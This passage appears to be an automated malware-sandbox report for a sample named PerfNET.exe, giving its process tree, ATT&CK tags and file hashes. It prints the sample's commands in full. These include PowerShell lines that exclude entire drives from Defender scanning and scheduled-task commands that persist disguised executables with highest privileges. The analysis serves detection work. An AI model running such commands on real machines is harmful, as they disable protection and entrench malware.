C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\fontdrvhost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Gadgets\ApplicationFrameHost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\ApplicationFrameHost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\fontdrvhost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PerfNET.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Kzjdnn1aoP.bat"2⤵PID:5972
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:6536
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5876
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\alQR4bHbbG.bat"4⤵PID:4192
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:5360
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6140
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4yjLtiCBkS.bat"6⤵PID:6568
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1920
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1940
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HLyChA1PXA.bat"8⤵PID:1980
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:232
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:6132
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5916 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2juDPxCKYX.bat"10⤵PID:6720
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:4580
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:1704
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"12⤵PID:6528
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:3136
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3596
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:1580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Styje6hwPL.bat"14⤵PID:6624
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:2884
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5200
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3792 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cE5h37GJz6.bat"16⤵PID:1268
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:6240
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:217⤵PID:3320
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:2312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:5392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'18⤵PID:4484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:5568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:5612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:3688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:6180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'18⤵PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:6780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'18⤵
- Command and Scripting Interpreter: PowerShell
PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'18⤵PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OEM\ApplicationFrameHost.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:6564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\nodejs\node_modules\npm\node_modules\unsecapp.exe'18⤵PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\services.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:4060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'18⤵PID:6396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\dllhost.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:2084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PerfNET.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:5300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BDmoTHZlW8.bat"18⤵PID:6468
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:5732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3080
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:1924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat"20⤵PID:6656
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:4976
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2408
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:2632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\COegk83zmU.bat"22⤵PID:3636
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:2844
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:223⤵PID:4712
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"23⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:2452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7gEkM0BkJD.bat"24⤵PID:4584
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:600
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:225⤵PID:4384
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"25⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\COegk83zmU.bat"26⤵PID:1976
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:5264
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:227⤵PID:1980
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"27⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7gEkM0BkJD.bat"28⤵PID:2212
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:5404
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:229⤵PID:6508
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q5hzjQRwNJ.bat"30⤵PID:6896
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:2960
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6068
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"31⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:1100 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zasSNaUvot.bat"32⤵PID:2076
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:6884
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:233⤵PID:1224
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"33⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4XCyKdTKaY.bat"34⤵PID:3596
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:1172
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2812
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"35⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8EsK2bkKJG.bat"36⤵PID:3784
-
C:\Windows\system32\chcp.comchcp 6500137⤵PID:4848
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:237⤵PID:6708
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"37⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XJaDrOzS3U.bat"38⤵PID:6856
-
C:\Windows\system32\chcp.comchcp 6500139⤵PID:2776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7084
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"39⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xv8ebS6cyh.bat"40⤵PID:1644
-
C:\Windows\system32\chcp.comchcp 6500141⤵PID:5976
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:241⤵PID:3440
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"41⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:2532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mLBZigXOC1.bat"42⤵PID:6688
-
C:\Windows\system32\chcp.comchcp 6500143⤵PID:1860
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:243⤵PID:6684
-
-
C:\Users\Default User\services.exe"C:\Users\Default User\services.exe"43⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xv8ebS6cyh.bat"44⤵PID:4900
-
C:\Windows\system32\chcp.comchcp 6500145⤵PID:4148
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:245⤵PID:4088
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Libraries\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\Libraries\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Libraries\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\ApplicationFrameHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\ApplicationFrameHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6564
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /f1⤵PID:5684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /rl HIGHEST /f1⤵PID:5612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe'" /rl HIGHEST /f1⤵PID:6768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNET" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Recovery\OEM\ApplicationFrameHost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Recovery\OEM\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 9 /tr "'C:\Recovery\OEM\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Program Files\nodejs\node_modules\npm\node_modules\unsecapp.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\nodejs\node_modules\npm\node_modules\unsecapp.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\nodejs\node_modules\npm\node_modules\unsecapp.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\services.exe'" /f1⤵PID:6776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /f1⤵PID:6804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f1⤵PID:6460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f1⤵PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\dllhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Branding\dllhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:64
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Windows\Branding\dllhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /f1⤵PID:5740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNET" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3832
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
6Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD56bba728694a9f636328c2684505549e3
SHA1371d680696c9549b14563ac26b87b4045cb4c815
SHA25654b544c25599d68872a15c1edbb160bf5fbfef3f561c9a7926a382625660d344
SHA512fef31517032a56bdd6cd14e10741123e47df982aac6404024c831adeeb195737718a41261e00440ad0ebe41f5bdce1a729ebfdd42a86fd3fb479a8f59547f14d
-
Filesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
Filesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
Filesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
Filesize
771B
MD5e9dc66f98e5f7ff720bf603fff36ebc5
SHA1f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA5128027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b
-
Filesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json
Filesize1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
